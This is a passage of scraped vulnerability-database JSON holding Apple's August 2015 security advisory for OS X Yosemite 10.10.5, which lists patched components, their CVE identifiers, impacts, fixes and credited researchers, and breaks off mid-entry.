Session id hijacking is possible under some conditions.", "edition": 1, "modified": "2013-03-10T00:00:00", "published": "2013-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12913", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12913", "title": "sudo protection bypass", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", 
"CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. 
These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. 
This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. 
This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. 
This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. 
This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. 
This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. 
This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. 
This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. 
This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. 
This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. 
These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling.\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. 
This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\nan unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. 
This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco 
Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application 
